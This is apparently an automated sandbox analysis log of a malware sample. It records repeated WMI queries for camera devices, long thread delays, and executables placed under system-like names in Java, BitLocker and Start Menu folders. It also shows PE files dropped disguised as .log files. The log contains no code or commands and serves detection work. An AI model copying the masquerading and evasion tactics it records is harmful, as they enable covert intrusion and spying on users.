                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe Memory allocated: EB0000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe Memory allocated: 1A870000 memory reserve | memory write watch
Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe Memory allocated: 1380000 memory reserve | memory write watch
Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe Memory allocated: 1AF40000 memory reserve | memory write watch
Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe Memory allocated: 1510000 memory reserve | memory write watch
Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe Memory allocated: 1B370000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe Memory allocated: 2F60000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe Memory allocated: 1B0F0000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe Memory allocated: 2670000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe Memory allocated: 1A800000 memory reserve | memory write watch
Source: C:\Windows\BitLockerDiscoveryVolumeContents\llflCdrMcgGB.exe Memory allocated: 18E0000 memory reserve | memory write watch
Source: C:\Windows\BitLockerDiscoveryVolumeContents\llflCdrMcgGB.exe Memory allocated: 1B310000 memory reserve | memory write watch
Source: C:\Windows\BitLockerDiscoveryVolumeContents\llflCdrMcgGB.exe Memory allocated: B10000 memory reserve | memory write watch
Source: C:\Windows\BitLockerDiscoveryVolumeContents\llflCdrMcgGB.exe Memory allocated: 1A960000 memory reserve | memory write watch
Source: C:\ProgramData\Microsoft\Windows\Start Menu\StartMenuExperienceHost.exe Memory allocated: 1830000 memory reserve | memory write watch
Source: C:\ProgramData\Microsoft\Windows\Start Menu\StartMenuExperienceHost.exe Memory allocated: 1B4A0000 memory reserve | memory write watch
Source: C:\ProgramData\Microsoft\Windows\Start Menu\StartMenuExperienceHost.exe Memory allocated: 9F0000 memory reserve | memory write watch
Source: C:\ProgramData\Microsoft\Windows\Start Menu\StartMenuExperienceHost.exe Memory allocated: 1A580000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe Thread delayed: delay time: 600000
Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe Thread delayed: delay time: 599871
Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe Thread delayed: delay time: 599025
Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe Thread delayed: delay time: 598891
Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe Thread delayed: delay time: 598688
Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe Thread delayed: delay time: 3600000
Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe Thread delayed: delay time: 598562
Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe Thread delayed: delay time: 598438
Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe Thread delayed: delay time: 598313
Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe Thread delayed: delay time: 598199
Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe Thread delayed: delay time: 598088
Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe Thread delayed: delay time: 597782
Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe Thread delayed: delay time: 597516
Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe Thread delayed: delay time: 597227
Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe Thread delayed: delay time: 597101
Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe Thread delayed: delay time: 596983
Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe Thread delayed: delay time: 596780
Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe Thread delayed: delay time: 596672
Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe Thread delayed: delay time: 596547
Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe Thread delayed: delay time: 596436
Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe Thread delayed: delay time: 596327
Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe Thread delayed: delay time: 596213
Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe Thread delayed: delay time: 596109
Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe Thread delayed: delay time: 596000
Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe Thread delayed: delay time: 595879
Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe Thread delayed: delay time: 595750
Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe Thread delayed: delay time: 595641
Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe Thread delayed: delay time: 595516
Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe Thread delayed: delay time: 595391
Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe Thread delayed: delay time: 595269
Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe Thread delayed: delay time: 595141
Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe Thread delayed: delay time: 595031
Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe Thread delayed: delay time: 594922
Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe Thread delayed: delay time: 594804
Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe Thread delayed: delay time: 594688
Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe Thread delayed: delay time: 594554
Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe Thread delayed: delay time: 594342
Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe Thread delayed: delay time: 594234
Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe Thread delayed: delay time: 594125
Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe Thread delayed: delay time: 594016
Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe Thread delayed: delay time: 593891
Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe Thread delayed: delay time: 593771
Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe Thread delayed: delay time: 593641
Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe Thread delayed: delay time: 593516
Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe Thread delayed: delay time: 593406
Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe Thread delayed: delay time: 593238
Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe Thread delayed: delay time: 593100
Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe Thread delayed: delay time: 300000
Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe Thread delayed: delay time: 592928
Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe Thread delayed: delay time: 592797
Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe Thread delayed: delay time: 592672
Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe Thread delayed: delay time: 592552
Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe Thread delayed: delay time: 592422
Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe Thread delayed: delay time: 592307
Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe Thread delayed: delay time: 592181
Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe Thread delayed: delay time: 591946
Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe Thread delayed: delay time: 591827
Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe Thread delayed: delay time: 591700
Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe Thread delayed: delay time: 591563
Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe Thread delayed: delay time: 591438
Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe Thread delayed: delay time: 591328
Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe Thread delayed: delay time: 591219
Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe Thread delayed: delay time: 591089
Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\BitLockerDiscoveryVolumeContents\llflCdrMcgGB.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\BitLockerDiscoveryVolumeContents\llflCdrMcgGB.exe Thread delayed: delay time: 922337203685477
Source: C:\ProgramData\Microsoft\Windows\Start Menu\StartMenuExperienceHost.exe Thread delayed: delay time: 922337203685477
Source: C:\ProgramData\Microsoft\Windows\Start Menu\StartMenuExperienceHost.exe Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe Window / User API: threadDelayed 4019
Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe Window / User API: threadDelayed 5576
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Windows\System32\SecurityHealthSystray.exe
Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe Dropped PE file which has not been started: C:\Users\user\Desktop\AHphtSeX.log
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe Dropped PE file which has not been started: C:\Users\user\Desktop\jjSkKJFG.log
Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe Dropped PE file which has not been started: C:\Users\user\Desktop\PDlWdMMS.log
Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe Dropped PE file which has not been started: C:\Users\user\Desktop\wlyrJHCD.log
Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe Dropped PE file which has not been started: C:\Users\user\Desktop\rUKsZmvt.log
Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe Dropped PE file which has not been started: C:\Users\user\Desktop\YPnuykix.log
Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe Dropped PE file which has not been started: C:\Users\user\Desktop\FUSHtkHk.log
Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe Dropped PE file which has not been started: C:\Users\user\Desktop\CUcqaUVf.log
Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe TID: 7736 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe TID: 5480 Thread sleep time: -30000s >= -30000s
Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe TID: 7804 Thread sleep time: -27670116110564310s >= -30000s
Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe TID: 7804 Thread sleep time: -600000s >= -30000s
Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe TID: 7804 Thread sleep time: -599871s >= -30000s
Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe TID: 7804 Thread sleep time: -599025s >= -30000s
Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe TID: 7804 Thread sleep time: -598891s >= -30000s
Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe TID: 7804 Thread sleep time: -598688s >= -30000s
Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe TID: 7976 Thread sleep time: -21600000s >= -30000s
Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe TID: 7804 Thread sleep time: -598562s >= -30000s
Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe TID: 7804 Thread sleep time: -598438s >= -30000s
Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe TID: 7804 Thread sleep time: -598313s >= -30000s
Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe TID: 7804 Thread sleep time: -598199s >= -30000s
Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe TID: 7804 Thread sleep time: -598088s >= -30000s
Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe TID: 7804 Thread sleep time: -597782s >= -30000s
Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe TID: 7804 Thread sleep time: -597516s >= -30000s
Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe TID: 7804 Thread sleep time: -597227s >= -30000s
Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe TID: 7804 Thread sleep time: -597101s >= -30000s
Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe TID: 7804 Thread sleep time: -596983s >= -30000s
Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe TID: 7804 Thread sleep time: -596780s >= -30000s
Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe TID: 7804 Thread sleep time: -596672s >= -30000s
Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe TID: 7804 Thread sleep time: -596547s >= -30000s
Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe TID: 7804 Thread sleep time: -596436s >= -30000s
Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe TID: 7804 Thread sleep time: -596327s >= -30000s
Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe TID: 7804 Thread sleep time: -596213s >= -30000s
Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe TID: 7804 Thread sleep time: -596109s >= -30000s
Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe TID: 7804 Thread sleep time: -596000s >= -30000s
Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe TID: 7804 Thread sleep time: -595879s >= -30000s
Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe TID: 7804 Thread sleep time: -595750s >= -30000s
Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe TID: 7804 Thread sleep time: -595641s >= -30000s
Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe TID: 7804 Thread sleep time: -595516s >= -30000s
Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe TID: 7804 Thread sleep time: -595391s >= -30000s
Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe TID: 7804 Thread sleep time: -595269s >= -30000s
Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe TID: 7804 Thread sleep time: -595141s >= -30000s
Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe TID: 7804 Thread sleep time: -595031s >= -30000s
Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe TID: 7804 Thread sleep time: -594922s >= -30000s
Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe TID: 7804 Thread sleep time: -594804s >= -30000s
Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe TID: 7804 Thread sleep time: -594688s >= -30000s
Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe TID: 7804 Thread sleep time: -594554s >= -30000s
Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe TID: 7804 Thread sleep time: -594342s >= -30000s
Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe TID: 7804 Thread sleep time: -594234s >= -30000s
Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe TID: 7804 Thread sleep time: -594125s >= -30000s
Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe TID: 7804 Thread sleep time: -594016s >= -30000s
Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe TID: 7804 Thread sleep time: -593891s >= -30000s
Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe TID: 7804 Thread sleep time: -593771s >= -30000s
Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe TID: 7804 Thread sleep time: -593641s >= -30000s
Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe TID: 7804 Thread sleep time: -593516s >= -30000s
Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe TID: 7804 Thread sleep time: -593406s >= -30000s
Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe TID: 7804 Thread sleep time: -593238s >= -30000s
Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe TID: 7804 Thread sleep time: -593100s >= -30000s
Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe TID: 7976 Thread sleep time: -300000s >= -30000s
Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe TID: 7804 Thread sleep time: -592928s >= -30000s
Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe TID: 7804 Thread sleep time: -592797s >= -30000s
Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe TID: 7804 Thread sleep time: -592672s >= -30000s
Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe TID: 7804 Thread sleep time: -592552s >= -30000s
Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe TID: 7804 Thread sleep time: -592422s >= -30000s
Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe TID: 7804 Thread sleep time: -592307s >= -30000s
Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe TID: 7804 Thread sleep time: -592181s >= -30000s
Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe TID: 7804 Thread sleep time: -591946s >= -30000s
Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe TID: 7804 Thread sleep time: -591827s >= -30000s
Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe TID: 7804 Thread sleep time: -591700s >= -30000s
Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe TID: 7804 Thread sleep time: -591563s >= -30000s
Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe TID: 7804 Thread sleep time: -591438s >= -30000s
Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe TID: 7804 Thread sleep time: -591328s >= -30000s
Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe TID: 7804 Thread sleep time: -591219s >= -30000s
Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe TID: 7804 Thread sleep time: -591089s >= -30000s
Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe TID: 7488 Thread sleep time: -922337203685477s >= -30000s
